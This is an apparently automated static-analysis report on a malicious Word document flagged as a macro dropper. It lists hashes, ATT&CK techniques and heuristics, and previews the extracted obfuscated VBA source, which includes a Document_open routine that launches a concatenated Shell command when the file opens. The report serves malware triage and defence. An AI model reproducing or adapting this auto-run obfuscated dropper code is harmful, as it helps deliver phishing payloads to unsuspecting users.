Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4369e3f339cb1b2e…

MALICIOUS

Office (OLE)

Size: 322.0 KB | Created: 2018-07-19 18:16:00 | Authoring application: Microsoft Office Word | First seen: 2018-07-23
MD5: ab623b1e6c0ee36bbde18a3b30f94e65 SHA-1: 38db080ced46c59f1a3ed87ad01e087b52601de3 SHA-256: 4369e3f339cb1b2e46c0dd9d35903a7afa34664c3b279c5d4904434d4f32681e
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. A critical-severity heuristic fired on a Shell() call within the VBA code; Shell() is commonly used by macro droppers to launch a downloader or execute a dropped payload, and here it is invoked from a Document_Open handler, so the command runs as soon as the document is opened with macros enabled. The ClamAV detection name 'Doc.Dropper.Agent-6615994-0' further supports its classification as a dropper. The document most likely functions as a spearphishing attachment designed to deliver a secondary stage.

Heuristics (5)

  • ClamAV: Doc.Dropper.Agent-6615994-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6615994-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                                  | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)     | 39374 bytes
SHA-256: f65d9c60c0942d8efcaaf82648fdc2f71abf78b91c81c3b7c763d27e46a1fda1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "mDWvoqoJDr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function ZatXNNWErQnOJ()
On Error Resume Next
   vtRLdM = 83866 - njuGac - 59418 / kwnTdi / uPdklu * tmrEZS
   hoGXT = 95674 - zbNzHd - 70087 / LVsXK / DKYdEU * OjjEU
   ULEpQ = 21917 - RrVBL - 6398 / TInEGn / MGuOsl * UlJqn
   XaLDi = 78010 - KEiNZS - 73459 / kzofb / rXAiB * LzqCdU
   vhbBb = 98474 - CCMBT - 35782 / IAJCI / HEJaXa * zFLKY
End Function
Private Function sKvRdXtAljsd()
On Error Resume Next
   ldqka = 65105 - OafFDP - 53385 / mNLoNp / VnQDvN * XNEzcP
   rRBjSE = 50371 - ftainD - 42683 / ABpDoD / LzwRJ * kfjGaw
   OMRqBD = 30202 - ivMPIX - 50553 / nKVvvK / NmpET * ZBckc
   pzUdXG = 2528 - DsOcip - 79976 / HhvCK / bJhvo * dGXMq
   IcaTR = 12649 - XGjCjz - 96977 / MiMIHC / hiJssJ * BNtJwV
   bziHbl = 8057 - DDAsE - 20110 / ZKidXm / KwcSs * wUBmw
End Function
Private Function soozwUvicDjzb()
On Error Resume Next
   bDQtB = 91594 - YZuEW - 88835 / OGiIb / qBlYY * jVlGm
   TwRJD = 86518 - Mvziz - 78696 / dJROI / cRLslD * fbpNR
   NnFiF = 73853 - XrlkB - 83854 / vzhDE / ZkVumT * NrQvXk
   ljotcG = 62676 - alwoa - 91227 / BPulq / XDHBcE * jBkwm
   EwpCiW = 17387 - JVHQri - 64455 / GCvOpP / Ejkkp * wdrVT
   UwQEiM = 38697 - LzfUn - 26521 / UDpkB / fjszB * jZBBCd
End Function
Private Function NVKzYRLGi()
On Error Resume Next
   PztOHL = 37599 - CRJSm - 49280 / ajfMAD / Xnhnk * XNqODl
   RVtkj = 56717 - tGZXOL - 76549 / ajiGvA / SXMsv * IYBKYz
   EqMztO = 4897 - IjJAw - 18792 / OJkZr / EZuajV * QAHIq
   ttOKIT = 2188 - CTXmf - 40031 / SADnM / nuwSD * LEcKZm
   TGMdw = 87488 - wJjYQp - 10425 / Hiqdu / jBmiYN * psjQH
   iwurJ = 26924 - wwpjf - 54403 / wLCqw / FwPsEa * DaJzzO
End Function
Private Sub Document_open()
On Error Resume Next
   iriwh = 4258 - tEmPi - 61625 / YsLQlb / DMYlzW * EtzXXL
   DPLwj = 17310 - wnBLfT - 48343 / EDzLKi / czvsW * fPtSYc
   RVMiLn = 14175 - PrAiot - 26649 / zvHafF / hfipL * sHUTub
   dJKGQU = 47462 - YdpiHr - 94716 / kdqst / QjFDZL * NokEbu
   AVKsVV = 66734 - RMrEOj - 9854 / AwbmRu / qjGIt * KrBLaD
   nipWj = 84241 - NWHHzz - 17338 / Ezott / ANvMtL * FdjzHw
Shell "" + iwwQjshdfUTfQQ + iZAnNAomK + CVar("c") + ItHqiwIYzO + KvUQYDFPwwCtCu + GNCYvDalp + uicNpQGbFQL + AZGzXEwm + PkZDi + JDkKX + RGPqGGWAc + dCwvTtaTD + jzurokd + ibMUE + IsKtXFtlU + HBjWF + khMAQMimJ + wjfbIVTrn + YhjlwGSJ + SfaPArMjrsc + NjbjoN + YGSRdAC + YYtwLXKhFLU, 0
   MpUHU = 81063 - ocaIzX - 41262 / zRJna / jUhNjd * swSKq
End Sub
Private Function RSTAwnDN()
On Error Resume Next
   HauVCw = 55928 - uproO - 69551 / owFlD / OjRERw * OZZzHZ
   jrbaIG = 8819 - HSErs - 23150 / uSYPd / BcvIDo * Lstir
   okrvl = 1998 - zzdEzR - 48287 / EufGm / XrUfQt * uzEZfT
   bapprk = 29775 - PzQAG - 63473 / wCUiJ / iZNui * aDDHXV
   fQEjw = 98223 - GFUAua - 88943 / XGjRRs / PVHjE * ZiRznC
End Function
Private Function zVfLOlwzlwn()
On Error Resume Next
   quEzuD = 9742 - lwXiYz - 93734 / WJncnP / zPmkz * pFssUP
   mNOoXn = 53727 - jVQhza - 64170 / FBAvZ / laZWnM * wWkruh
   ioCjli = 55888 - nunMr - 91341 / IwJNcr / wdbMu * WwQtcL
   EmLkr = 39991 - cpEUhJ - 56274 / CMiSr / fnaJS * zPrFwz
   QdEbQ = 14554 - brzWq - 35601 / mnZZwj / YEZnpw * dujfkT
End Function
Private Function PXTtmwwCs()
On Error Resume Next
   lSljsG = 13337 - iWJLAE - 23299 / rKTTdX / RzSLh * AdSziL
   lqvqzj = 51456 - WnKmC - 54348 / ziNrtn / mwZaG * LqhXw
   HIBiw = 87749 - KWEZif - 4042 / IwJRFK / oXGobi * KXqhBj
   NQzhS = 81596 - fAMsCd - 43369 / wfPQiL / cLJMB * AIBVM
   FDsMR = 53112 - NOWOzn - 72517 / VUuZa / Mjwmc * zJzQB
   YShhnc = 35586 - TrFKv - 81605 / QWANIT / ZuZAds * MVtUOS
   NLIlY = 6213 - ovOwI - 25137 / XHiwoh / LizcL * tnnMa
   ZiHImn = 5035 - HuAYf - 15690 / bbITqt / UwapLq * OGNMF
End Function
Private Function ivjhnYQdZzZmVk()
On Error Resume Next
   TKpIEZ = 32230 - VqwnTi - 68162 / MKvKm
... (truncated)